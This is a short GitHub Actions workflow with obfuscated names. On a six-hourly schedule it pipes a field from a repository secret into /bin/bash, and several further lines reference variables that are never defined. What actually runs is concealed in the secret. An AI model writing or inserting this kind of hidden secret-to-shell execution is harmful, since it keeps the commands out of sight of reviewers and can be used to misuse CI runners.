name: kongbaoxutie

on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kongbaoxutie
        env:
          pexl8: ${{ secrets.pexl8 }}
        run: |
          echo $pexl8 | jq -r .qlbw0 | /bin/bash
          echo $fs6 | jq -r .zvh09862 | /bin/bash
          echo $a8 | jq -r .mmpy31455 | /bin/bash
          echo $avyat16 | jq -r .u8 | /bin/bash
          echo $zs3473 | jq -r .uaxtv5684 | /bin/bash
          echo $apa41 | jq -r .jbwze8242 | /bin/bash
          echo $cqzw607 | jq -r .xsex66357 | /bin/bash
          echo $a2844 | jq -r .gd6949 | /bin/bash

